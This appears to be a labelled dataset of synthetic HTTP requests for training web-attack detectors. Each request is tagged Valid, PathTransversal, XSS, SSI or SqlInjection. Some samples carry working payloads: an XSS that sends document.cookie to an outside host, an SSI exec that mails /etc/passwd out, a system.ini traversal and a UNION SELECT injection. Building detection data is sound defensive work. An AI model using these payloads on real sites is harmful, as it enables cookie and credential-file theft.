Client-ip: 67.147.203.12
Cookie: RyoJuGh4=ts6y?ko0se5o7e;p6esaretolq=si01mGzfInoi
Cookie2: $Version="106"
Date: Wed, 24 Nov 04 21:18:30 GMT
ETag: W/"LPTK.z6q0rpOnql8I"
Expect: 100-continue
From: hiDbh@eMCsorant.biz
If-Modified-Since: Thu, 16 Sep 04 24:58:05 CET
If-Unmodified-Since: Tue, 08 Feb 05 05:21:18 UTC
If-Match: *
If-None-Match: "L5mf.R3W5nZNld1tN"
If-Range: Fri, 25 Feb 05 13:11:24 GMT
Max-Forwards: 1
MIME-Version: 1.1
Pragma: d='ean'
Proxy-Authorization: NTLM ZWVnb2ZoYXNMcHNlT2VwZm5hY2VFZHRoYTNVcmVnaHNTZWFsam90YWxkUmNy
Authorization: NTLM c2dlZ3g4SHJ0aW5laXNmaU5oaXRtaWVhaHpyZWhic3RmUmU1OWlhcmE5cQ==
Range: 9-,-1,846-
Referer: /Dkasdfh/uet5nise/xtdcfnj/noswpauy.wav
TE: gzip,trailers
Trailer: If-Range
User-Agent: uotna7dOt
UA-CPU: Sparc
UA-Disp: 9881,382,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 833x678
Via: 1.3 www.F7rhnmEe.jpg, 2.7 228.44.186.150, FTP/9.6 www.etretcg.js
Transfer-Encoding: osmn; Meesrxh=qek7
Upgrade: n83/8.7, wpeioz/2.0, Rbtic5/8.3, s4h/9.8
Warning: 689 59.20.50.124 "oykisiteb" 
X-Forwarded-For: 9.228.133.238
X-Serial-Number: 538548
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8284
Start - Id: 4843
class: Valid
PUT /ll.nsf? HTTP/1.0
Content-Length: 215
Content-Language: e,etdpae,slint
Content-Encoding: identity
Content-Location: /3ic5csm/nU1tlxb/aspRcKuo/5fta/adydau.pdf
Content-MD5: eWkxc3RobmFtbGVudG51aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Jan 07 10:10:45 CET
Last-Modified: Wed, 10 Jun 09 16:44:25 GMT
Host: 28.128.234.178
Connection: iasiiQe
Accept: */*
Accept-Charset: macintosh;q=0.3, iso-8859-15;q=0.3, euc-jp;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=692
Client-ip: 21.236.219.29
Cookie: ndsnnkApansSym=enepcsElli;yrwksneiRec=62;i9oeqdC=72989047
Cookie2: $Version="186"
Date: Wed, 02 Feb 05 06:41:18 GMT
ETag: W/"BOYwfV_2sW@tPOz09vR"
Expect: 100-continue
From: leaTmHa@pheie.net
If-Modified-Since: Fri, 05 Mar 10 02:53:47 CET
If-Unmodified-Since: Sun, 02 Jan 05 10:12:08 CET
If-Match: "zZrPtFn4Btz-ZI38lPZ"
If-None-Match: *
If-Range: "IeuJy7PMh0YQU_KrR"
Max-Forwards: 11
MIME-Version: 8.6
Pragma: n=rh
Proxy-Authorization: naIcSN re1rfCoS=bpehrr
Authorization: NTLM ZXNvbXZmQWlyaE5wME5odHFvSWVzdG5neWVwbmlsbGFyQmg4b29lcnRtMg==
Range: -2648,-1383,481-169
Referer: /eutyftrt/rbs5/if7ssix/netNs.htm
TE: trailers
Trailer: Accept-Language
User-Agent: eETnZA http://www.dMe5Rud.net
UA-CPU: StrongARM
UA-Disp: 092,446,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 812x666
Via: FTP/7.0 www.posa.tiff, HTTP/4.7 www.3amnd.gif:35143
Transfer-Encoding: compress
Upgrade: 0coex/6.3, 92da/1.7, 0o7h/3.9, 0ah/4.2, etiE/1.6
Warning: 023 191.251.175.83:94352 "ra7sp6lsitbtinme" "Sat, 03 Oct 09 15:33:52 UTC"
X-Forwarded-For: 191.124.85.186
X-Serial-Number: 408211072514512
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

osrtlv=ba&oa1=ne&teing=noad&NfunHuofe=gb5bhdxi1aenf&5kPZD84=tkSKAEQppZrL&ia0iieaooona=ologCa&orosgkanyuy=h4aIxE@.D3z&og4=ytscre~rcopenmeyhah&tnhenvr=w_OW-I&nicrcSeee=ezbgs&IrkX=2t0bg&9l6t2toemikbn=En&uafnqan=dij

End - Id: 4843
Start - Id: 20361
class: Valid
GET /tBNRa1hnr/sIbp9NXG/asmc8h9iIqadoaoe/LiiLrszos2blurrd/nkane96fr9amwhtnmio/1erohotnc/Ani3aedoutlrct8bhb/oK/yT/amaneveuecDemtuse.dll?sen=1&yjserhyh=il%3EzioE6%29a%26Eh%3D%25%5C&W-7L2yq6pescriptp=uGemsRuee&tprhta9m5=vYBIT HTTP/1.1
Host: www.prurw.biz:80
Connection: close
Accept: */*
Accept-Charset: utf-7;q=0.6, koi8-r, windows-1253;q=0.5
Accept-Encoding: *
Accept-Language: ldas-ld4u22, otue-htaM0q, np2a2-yo;q=0.0, nXte-ieh;q=0.4, bi-zojatu;q=0.2
Cache-Control: Bd=e2ieRone
Client-ip: 154.221.244.163
Cookie: ro=r;labesmrug=9210038
Cookie2: $Version="534"
Date: Wed, 04 Apr 07 07:44:39 CET
ETag: "EbDDSObU4FSkUAKQ5"
Expect: 100-continue
From: ueaw@nsel.fr
If-Modified-Since: Tue, 08 Jun 04 01:37:01 CET
If-Unmodified-Since: Wed, 17 Mar 10 18:45:04 CET
If-Match: "ScV8WdFt.M9W5F5k"
If-None-Match: "7H2LUn5RgkghCIze"
If-Range: Sat, 06 Mar 04 10:55:53 CET
Max-Forwards: 922
MIME-Version: 0.0
Pragma: dRrnl='brrio'
Proxy-Authorization: Basic bzJlZW50ZXA6dHdpYWU=
Authorization: Basic endzQnVobnc6Y1NySXI=
Range: -18
Referer: /ued3oa/rOioa/jctcni5t.png
TE: trailers,trailers,gzip
Trailer: Trailer
User-Agent: Mozilla/5.3 (X11; U; Linux i386 0.6; Ee-Ye; rv:2.2.3) Gecko/91086112
UA-CPU: Sparc
UA-Disp: 139,156,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 912x315
Via: FTP/8.2 www.tgfp.gif, HTTP/2.0 www.2tEni.html, 0.6 www.tedr.jpeg
Transfer-Encoding: gzip
Upgrade: nxt3/7.1
Warning: 906 176.243.168.21 "eorneinhwtfccewarec" 
X-Forwarded-For: 240.25.195.20
X-Serial-Number: 11331311370992169456
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20361
Start - Id: 44828
class: PathTransversal
GET /jstaaOs.cgi?z0PMf-xp_D=sRNpnDAhgo&rioerddlt2nn2e=%3C%26S&telnetIYX-g=om4X&t1IhiyOsSqu=-Eoss%7Emoea&M-DP707etcaccess_logXh=17264&M1ei3tyneni=eg_iNyWfA&4t=it36_&EnTcbiiilsw=fu&Osv0=doc%28+++++file%3A%2F%2F%2Fc%3A%2F7f%2Fnddz.xml+++++%29&setewn1sLf=466435&awatuHG=xNGr&awsim8mtnv=wZ2ixOPQ.&iF=9 HTTP/1.0
Host: 191.202.151.202
Connection: a4e6csir
Accept: application/zip;q=0.8, audio/basic, image/png
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: so-s, a-ctakhnro, Re0e1Ie-soeffa;q=0.4
Cache-Control: no-store
Client-ip: 92.163.213.217
Cookie: oiero1c84ea=neiG
Cookie2: $Version="23"
Date: Sun, 27 Sep 09 20:41:01 CET
ETag: "7pHQPh8U0xFLR5oelO"
Expect: tDAl
From: eosehi@IsoiaSe.uk
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Sat, 25 Nov 06 19:15:51 UTC
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: *
If-Range: "AwNEyj99C2j5zSWS"
Max-Forwards: 7
MIME-Version: 9.8
Pragma: S=n
Proxy-Authorization: dsect8 atir0rto=aaeeis
Authorization: eH4teM jsxnoc=5ihxiqi
Range: -7,891-,-651
Referer: /nCtmofe/ldehnr.txt
TE: chunked,chunked,gzip;q=0.4
Trailer: From
User-Agent: goi4tbaip/4.7.6
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 123x704
Via: HTTP/5.3 241.190.43.239:8475, 1.1 109.50.57.136, 5.1 www.fwagr.jpg
Transfer-Encoding: mance; cusrI9t=dim5eso
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 279 5.34.104.253 "ycytrdqnsuf" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44828
Start - Id: 47863
class: XSS
GET /1okvntfe/heeer2ec2hheijeqi/cnew/qcmdLm1LvjhtpassNHr.html?aheuroeldejee=uH%3C3r%27e%29r3ordds&OudupdateFrmU-r=eteahlewce&drsd7i1he41=2&@6tVb.BepK=eeEb&sm=0leIuncxbi1oronh&BgPUfvz=u4&cn=%3Cinput++++type++++%3D++++%22image++%22+dynsrc+++%3D++++%22++++javascript%3A+++%5Bwindow.open%28%27http%3A%2F%2F36.192.132.214%2Fnentve.swf%27%2Bdocument.cookie%29%3B%5D++++%22++++%3E&fteaIiaatb=8s0Ik4wdOg&htleaasvNl=htpassrrls1 HTTP/1.1
Host: www.till.fr
Connection: srlhe
Accept: application/*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: nstruni-lcmdwTey, iqrmhn-Tnwl, 01o-a
Cache-Control: no-cache
Client-ip: 5.197.242.191
Cookie: 3evishneqeoen=1GbcbW_;ar=rgQa;r6IsGpyit1=sc7HPr;n9tehtue2etmeIn=u_5;oenejf=5572018
Cookie2: $Version="7"
Date: Wed, 11 Mar 09 12:16:54 UTC
ETag: "XpcaPWmdEo5d0C5fo2Ly"
Expect: teast5=egohe9Eo;ieasj=rsrnmih
From: 5uawbe5@Rlotbsnho.net
If-Modified-Since: Mon, 13 Oct 08 19:18:02 UTC
If-Unmodified-Since: Fri, 05 Nov 04 19:34:13 UTC
If-Match: "HZ4toqp_XQEkBE7tuQ"
If-None-Match: *
If-Range: "LT1pU7QIvOSM@Aaau"
Max-Forwards: 375
MIME-Version: 9.4
Pragma: eux8O='sbirs'
Proxy-Authorization: Basic Y3Jqbm0wYTpuMm9Zeg==
Authorization: ofnYi dkhs=1ratui
Range: 595606-7,222673-07
Referer: http://www.h0roe.st/Ooc4hla/Totq2/id1rc.swf
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.1 (Windows; U; Win98 0.0; 6r-Q1; rv:4.5.2) Gecko/15749776
UA-CPU: StrongARM
UA-Disp: 4309,162,32
UA-Pixels: 3411x5439
Via: 2.0 138.209.196.173:24563, sTrb/6.3 www.8xc5U.htm
Transfer-Encoding: gzip
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 546 www.taehteaa.gif "qmeXpetfcrEeeEci" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 110017564718
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47863
Start - Id: 45524
class: PathTransversal
GET /3-pZ0-/wNebv6Yc5Kps.js?4Ag=034351&sstaSpmtbaonou=%5CWINNT%5Csystem.ini&su=adtd&Sh7ANV5=e3SOCWIh.9&ornwcsfelto89=d.ag0a9ILA9&i4=015&iaEaf=5898&s9ugC7connect=1ees%3Brt&wutlimen2o6a=22 HTTP/1.1
Host: www.aaapflya.de
Connection: keep-alive
Accept: text/*, application/*;q=0.0, text/*
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.3, compress
Accept-Language: sqdp9ai3-eZ2a, re-r1Et;q=0.8, aqU3rsve-s
Cache-Control: min-fresh=59739
Client-ip: 228.114.110.173
Cookie: aeutest=omVT2;zsll=ilfBe;as8GaOulntashe=IB uc
Cookie2: $Version="678"
Date: Fri, 21 Mar 08 02:19:12 UTC
ETag: W/"JCTn_ojKBCwZqY_Co"
Expect: 100-continue
From: iofh@bmeUEpaiu.ch
If-Modified-Since: Mon, 12 Sep 05 23:21:41 UTC
If-Unmodified-Since: Sat, 29 Dec 07 23:04:24 UTC
If-Match: "syL4kzaXZD_fnT1kPl5F"
If-None-Match: "2xpFUXM0tsl_AHRt9t"
If-Range: "3n3uC.-P2wspN5e.7"
Max-Forwards: 43
MIME-Version: 5.3
Pragma: tRdslc='d9ae'
Proxy-Authorization: Digest realm
Authorization: NTLM cFNyaGxyRWVobWlpbm9pcWlyY3VvYWVMamg4cmVJZFNlbkJsb2l0d3JlcjR6ZW0=
Range: 55569-482846
Referer: http://www.tnlrrew4.ch/towwenf/ge4tP.php
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/6.5 (X11; U; Linux i386 1.7; nc-le; rv:6.2.3) Gecko/39082155
UA-CPU: 68000
UA-Disp: 3482,2872,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 441x867
Via: 9.5 239.83.237.158, 8.0 www.mYLq.png:21, 0.1 www.atNsadle.js
Transfer-Encoding: compress
Upgrade: nmd/9.2, eRd/0.5, hUaEtw/4.3, efae4/7.1
Warning: 291 197.115.20.32 "ofotvtereustbtDpofo" 
X-Forwarded-For: 55.26.191.205
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45524
Start - Id: 24722
class: Valid
GET /rj4oviCtbaeoi9Cnnds/Retsttwlb3oeorf/G3/tl6SDmtLivrzL/oGWlj_cuWbrlqX9_7JQD/byMwTh9sY8K.css?issstmr2sotrnp=270627&xhTseiil8ezten=xtermtmpeueoi&aoh5eQgll8=b9aIhaize&tedo=38135023&sne=7121318&7eg=09&PGb8k=e&0u=scsock_stream%7C6cmd%3Daehtr%27%5Bio HTTP/1.1
Host: 200.250.64.35:80
Connection: close
Accept: */*
Accept-Charset: euc-cn;q=0.8, x-mac-japanese, cp-936
Accept-Encoding: 
Accept-Language: f-8rnrSemU, koe7ot-nieNsnth, otWn-it;q=0.3
Cache-Control: 5n='lptsng'
Client-ip: 246.244.195.20
Cookie: rE2la88auie6wha=enh=i;tt3ltzarm=script;mrucDaiseoh5m=861;_Jdb=1henataam/n
Cookie2: $Version="667"
Date: Mon, 07 May 07 22:50:29 UTC
ETag: W/"70RV38@MF.et0pJ.A"
Expect: 100-continue
From: rtat7i@re8ta.net
If-Modified-Since: Tue, 18 Sep 07 10:13:02 UTC
If-Unmodified-Since: Sun, 17 Apr 05 22:43:46 UTC
If-Match: "m80TAJl8TPgO7XVi"
If-None-Match: "Qguwk4KZMzN_n55WC9O6"
If-Range: Wed, 23 Sep 09 03:17:20 UTC
Max-Forwards: 721
MIME-Version: 5.8
Pragma: hondde=a1w0w
Proxy-Authorization: NTLM YWJvdG5vbHJzdHNlbXJvZmlldTJkT2VnYWRSc1B5bzdlaWJodGNy
Authorization: Basic MnRhYXRpOmg2bGFheQ==
Range: 94913-68559,806419-4130
Referer: http://eepAqe.cz/naienar/wtLa/hBmEt/sara/sqwi.dll
TE: gzip;q=0.0,deflate;q=0.6
Trailer: Max-Forwards
User-Agent: n0@4vCa http://www.urpiE.be
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1017x8120
Via: FTP/3.0 www.exnbfE9R.gif
Transfer-Encoding: bhcai
Upgrade: dsys/9.6, Sy3/4.7, ant/6.6, ta9a/3.8
Warning: 261 www.tddrisan.shtml:4608 "amni" 
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 22326900137086
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24722
Start - Id: 26801
class: Valid
GET /ddo7qtderoEixbtete/q12Hteil.mspx?AC9x=ohsm&stekioispAnee5=28589&eisebi=tscriptOnitdwdayr&sf6RhehsseY=zso+&mrjremyrwitewb=23&de=elSnTriiy&TaaEorn=g6en4bnrnddr&ekceqitwo=872&iEhcte5olo=33343&epd4Tit=%25&ighhAEj4n=te&a6e8vlr=euuuX31P92 HTTP/1.0
Host: 117.25.123.232:5
Connection: keep-alive
Accept: application/rtf, audio/*, text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e-es, Fctwm-n4mickqi, nsopeous-hvj
Cache-Control: no-store
Client-ip: 41.148.162.64
Cookie: PWlocation8QAyd=4kyssmthtrsbt;st1oleoah7tynew=51519878;xamj9=sDvUA-@BXQ7;b6sIAsevv=l?
Cookie2: $Version="658"
Date: Sun, 21 Dec 08 13:36:57 CET
ETag: W/"uO.yVFnIZtgrTdYokFBZ"
Expect: 100-continue
From: kEqlnim@ntnj.ch
If-Modified-Since: Wed, 02 Nov 05 08:06:05 UTC
If-Unmodified-Since: Sun, 25 Apr 04 01:32:45 CET
If-Match: *
If-None-Match: *
If-Range: "MGSYhfl1zI2sE@GYyi2"
Max-Forwards: 6698
MIME-Version: 8.3
Pragma: nhshl=loe
Proxy-Authorization: Digest realm
Authorization: NTLM bWF3MW1yaWFyc2xkbnNlaHNydHNjMjZjdWhiZW5vc2ZjaXJlbw==
Range: 09-115498
Referer: http://www.atxtnh.org/tsfr0/ezie0eS/btars/gniasq.pl
TE: trailers
Trailer: Host
User-Agent: Mozilla/9.0 (X11; U; Unix 6.5; ri-ge; rv:1.7.5) Gecko/41034143
UA-CPU: StrongARM
UA-Disp: 8290,106,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3935x4964
Via: 5.0 222.60.67.255, HTTP/2.8 32.210.68.24, 7.5 www.j6O7p.shtml:4531
Transfer-Encoding: gzip
Upgrade: coar/9.8
Warning: 269 www.i6Whrlab.tiff:1 "5pHj" 
X-Forwarded-For: 46.254.197.126
X-Serial-Number: 51104
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26801
Start - Id: 11369
class: Valid
GET /ij/VKKFombodyZ4oKN5a/hekuel/trTib6/k2nfhmioAe3iw8eet/Crcp/a0oa93/mYSP/r3lriei2AOaa/jran8aiarahtspN9jhrh/t_fZ.asmx?lformZCiHvary5MF=nCp&eAps1y=%29tetp&debggvy=aQBT HTTP/1.1
Host: www.dnosv9aWa.de:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: koi8-r, utf-8, big5;q=0.9, euc-tw, us-ascii
Accept-Encoding: 
Accept-Language: l8fasdnr-ieOm, oaopsie-a5ti;q=0.4, kroRl0-Ercc;q=0.1, l-qtmdTi
Cache-Control: max-stale=28433
Client-ip: 90.63.149.173
Cookie: Ym=45644650;nt=usre:fesNpfi;Jn0dcmeVND1E=pszss
Cookie2: $Version="94"
Date: Wed, 24 Feb 10 08:41:28 GMT
ETag: W/"3M8cDySpghlrU1RNRf4"
Expect: 100-continue
From: ap2s@tiVznaj.com
If-Modified-Since: Tue, 12 Jul 05 18:18:20 UTC
If-Unmodified-Since: Sun, 24 May 09 01:34:21 CET
If-Match: "LqAE9oghGPpoxAIwCu"
If-None-Match: "3q.rYOOFtMCC7MHSCAw"
If-Range: *
Max-Forwards: 86
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="rtslr"
Authorization: Digest realm
Range: -6791,6-,-511169
Referer: /sMalEGl/ateEeH/m3Inefyl/tatsntbe.php
TE: deflate,gzip,chunked;q=0.1
Trailer: Referer
User-Agent: Mozilla/3.5 (X11; U; Open BSD i386 1.8; ff-on; rv:2.4.7) Gecko/45211927
UA-CPU: StrongARM
UA-Disp: 299,1774,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6133x6762
Via: HTTP/6.7 232.250.239.83:5193, FTP/2.5 113.214.103.178
Transfer-Encoding: prge; eeaaepzt=osq7i4
Upgrade: iAsv/6.0, wsydh/9.0, asdrd/6.4, ea7/7.8
Warning: 549 54.14.146.24 "veiinschlftang5nhhmr" 
X-Forwarded-For: 100.230.251.99
X-Serial-Number: 0505318
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11369
Start - Id: 17436
class: Valid
GET /uxr9x/WPXqEOMEwinnteb6_v/i@M9a2.O_w-BicgFht.swf? HTTP/1.0
Host: www.tsnsi.net
Connection: nlice
Accept: */*;q=0.4
Accept-Charset: iso-2022-jp, x-mac-chinesesimp;q=0.9, macintosh;q=0.4, iso-8859-8, koi8-r
Accept-Encoding: identity;q=0.9, identity, compress
Accept-Language: sps3mo-oLlen, PhAulm-e3u;q=0.8, tcpooeOs-ndT6etle
Cache-Control: max-age=41
Client-ip: 0.107.219.106
Cookie: rOruyfac6sant=lprocessing-instructionoeehgeutn
Cookie2: $Version="13"
Date: Tue, 26 Jul 05 18:19:13 CET
ETag: "Tz5k1C2FPPb20Du74.Ho"
Expect: eeOjeim=shOr;el0lberd=Lrnleij
From: asobeo@yaOtdneg.de
If-Modified-Since: Tue, 12 Feb 08 07:51:06 CET
If-Unmodified-Since: Sat, 09 Apr 05 18:57:08 CET
If-Match: "CZIejzt-F-VI5Z5Af"
If-None-Match: *
If-Range: Thu, 27 Jul 06 16:04:34 UTC
Max-Forwards: 769
MIME-Version: 5.3
Pragma: b='d'
Proxy-Authorization: Basic ZGVDb09pMDplbmRnY3Q=
Authorization: Digest nc=834c5efB
Range: 8-
Referer: http://www.tdroz.ch/irh9/Dausyoun/emkie/esch/7ceoseu.php
TE: chunked,trailers,trailers
Trailer: Host
User-Agent: lSnoa9yn/9.1.1.1.1
UA-CPU: MIPS
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 769x9384
Via: 2.7 www.ocatsyf.jpg, FTP/6.2 www.miwied.png
Transfer-Encoding: gzip
Upgrade: tnn/6.0, dhp2e/7.9, 7eo/4.5, 6ei8oh/4.0
Warning: 807 www.ienu.tiff:7433 "tnzkneini" "Fri, 27 Feb 09 18:56:57 UTC"
X-Forwarded-For: 29.239.233.138
X-Serial-Number: 52284057
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17436
Start - Id: 40208
class: SSI
POST /08eL1A/enEuS4U7xm0m.php4? HTTP/1.1
Content-Length: 55
Content-Language: auo,to,NEb0e
Content-Encoding: identity
Content-Location: http://www.eMre.biz/yo3m/ud10xO.txt
Content-MD5: NG4xU3RwaGxmcGRzYWVyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Jun 05 08:04:14 GMT
Last-Modified: Mon, 16 Jan 06 23:01:08 UTC
Host: 108.135.52.245
Connection: close
Accept: */*
Accept-Charset: macintosh, macintosh;q=0.5, koi8;q=0.3
Accept-Encoding: <!--  #exec     cmd="/bin/mail 8c.com   <   /etc/passwd"-->
Accept-Language: *
Cache-Control: no-cache
Client-ip: 126.112.53.52
Cookie: PdsS7ei4saasNne=i1E;iftSsbhMb3wy=KSehrlaeoNfshn;hN8i=eeftpurxmlvarel1e;mbu=420984;pAdew=sDZ3C
Cookie2: $Version="596"
Date: Sat, 01 May 10 15:28:34 GMT
If-Modified-Since: Sat, 22 Jan 05 02:13:45 CET
If-None-Match: "P2_nyij1TOtB8_5R6b"
Max-Forwards: 97
MIME-Version: 1.2
Proxy-Authorization: NTLM ZXIxbzFhb3RlZnRUdG1icm5sc2ZhNmEyMnVzZTgzaXdvaTNyZWJsMHNKaUE=
Authorization: Basic c0x1RWJTdDQ6aXNuRWc=
Referer: /Mapirp/xtompee/neng/v0utlnrM.nsf
User-Agent: Rceecapaei2nl
UA-Pixels: 616x735
Via: HTTP/6.5 34.232.90.96, HTTP/1.4 50.68.35.230
Transfer-Encoding: deflate
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

d63skataitihtm=56871&rSEc2teen6=iuIJ&aiua2q4artqn=73681

End - Id: 40208
Start - Id: 22107
class: Valid
GET /8oneetadrhaoii/oluatn/Ceenha3ga/eWGbQnTYn/5g7ssy0335lpN..qimIy.png?iti4ue=1&eGcs=uh%25uda+palltuq&ebemDpNRothn=631824520&coo4uny1hsrlll=f%7C+5t&Hahnu6itL=l9e&eewpzrmtrrh=irdocument+ma%5Bhhttphlibhn%3Bwherehd%27&hal=%3Dne%5C HTTP/1.0
Host: 119.138.61.172
Connection: keep-alive
Accept: text/*, video/quicktime
Accept-Charset: iso-8859-8-i;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: qmemuga=tp5f
Client-ip: 203.16.208.96
Cookie: SniIeee=12136;oeekq=iframe);1rdn=tdHA6g4GmpS
Cookie2: $Version="5"
Date: Wed, 06 Jan 10 03:07:17 UTC
ETag: "LacjLBXku.K2a0kE9RB"
Expect: raried
From: cemr@yhuhe3Dw.cz
If-Modified-Since: Fri, 04 Mar 05 07:34:52 CET
If-Unmodified-Since: Thu, 30 Sep 04 11:39:15 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Oct 09 15:56:32 UTC
Max-Forwards: 20
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest response="2e393a16f1cF1ddcEaF6e4E15f49C06b"
Authorization: Basic aWlvaDowYWRo
Range: 1976-
Referer: http://epnoo.ch/aslauedi/rfi83ot/gsteehi.exe
TE: trailers,deflate;q=0.0
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.7 (X11; U; Open BSD i586 4.2; ee-ia; rv:8.1.2) Gecko/86017264
UA-CPU: x86
UA-Disp: 5128,861,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8724x0388
Via: 6.4 17.74.34.133, 8.9 107.172.180.50, HTTP/4.5 245.221.253.150
Transfer-Encoding: driaeT
Upgrade: sdqs/1.2, otap/2.3, suO/8.6, t03/1.8
Warning: 536 162.78.197.155:33480 "iebaetgd" "Tue, 25 Oct 05 10:31:53 GMT"
X-Forwarded-For: 174.83.21.40
X-Serial-Number: 42920569636252963929
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 22107
Start - Id: 17255
class: Valid
GET /o2LwbERqKv892OI/RanodezD2Uff12/a5QM6_dZsOVy7b9f0J2/v4f/iai/tsjncdd2studnoeya.jpeg? HTTP/1.0
Host: 213.146.56.110:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-3;q=0.7, x-mac-japanese, iso-2022-kr, cp-936;q=0.8, koi8-r;q=0.9
Accept-Encoding: gzip;q=0.0, gzip, deflate, identity, deflate
Accept-Language: *;q=0.5
Cache-Control: eneMQsdo=leow
Client-ip: 153.216.113.201
Cookie: ia2oeehhwmcil=rnee7s1iZ ;PCKpKNY_vbscriptL8=echodeen5ht;ytoicw=se';dSs@BMFlike-nph-d@=E1l0Eow1eanllrqh
Cookie2: $Version="6"
Date: Mon, 24 May 04 23:28:23 CET
ETag: "S@@1nfvdPNmj48qVNstc"
Expect: s3sfseb9=eog84p;tHio0o=j0ta
From: 51hi@hb0porCAre.cz
If-Modified-Since: Sat, 13 Dec 08 24:38:38 CET
If-Unmodified-Since: Sat, 04 Dec 04 16:24:36 GMT
If-Match: *
If-None-Match: "KYONNLYXwmksuLrju"
If-Range: Fri, 28 May 04 18:52:36 CET
Max-Forwards: 66
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic dnRuamVzdGE6dGF0dGhlZQ==
Authorization: Basic dGFFdDpoaXVlanRx
Range: -986,9134-
Referer: http://www.onieOoTa.de/zi8tr0ut/nYkoasr/imt6lDa/wm99ihi.zip
TE: trailers,chunked;q=0.4
Trailer: Via
User-Agent: Mozilla/7.7 (Machintosh; U; PPC 3.3; sr-ri; rv:5.1.8) Gecko/70954584
UA-CPU: StrongARM
UA-Disp: 9714,1631,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 425x7082
Via: eyn/7.1 www.erent.jpg, 5.5 125.144.50.230, zniae/1.7 179.28.102.168
Transfer-Encoding: lftwo
Upgrade: e7eli/6.7, 5Tued/6.2
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 835471798337
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17255
Start - Id: 41356
class: SqlInjection
PUT /feNknevRb/qWdDKK/2slt/ds0Cyy/Amieaosu2skOqimeEtbs/kCT4KD/egtXLAYR7nKWM/e3jPnXycLqC@dj5pz6qQ.swf? HTTP/1.1
Content-Length: 129
Content-Language: cryetm
Content-Encoding: compress
Content-Location: http://iIe0.cz/rtdlemaH/ayoee/eei3a/z7see6.js
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 30 May 07 08:33:33 CET
Host: www.rchltem.net:80
Connection: keep-alive
Accept: application/zip, video/quicktime
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Date: Tue, 11 Mar 08 22:16:00 UTC
Expect: is7uta
Referer: /prlsh1io/a6ec445/eWRlhor.pl
TE: deflate,chunked,chunked
User-Agent: osarMsan (gD-PP35a; aYu9__A1; eCh94BbUm; 048j@sQ)
Via: 2.7 15.185.140.190:00, HTTP/6.6 80.1.206.76:509
Upgrade: nhetgd/3.9

to32ger=908&ToEimmarem6te='UNIONALLSELECTfieldFROMmalemaenneWHERE''    ='&otaeTdn=esdKheolo&finputhe80QVQ=zdaesawt9elte

End - Id: 41356
Start - Id: 10009
class: Valid
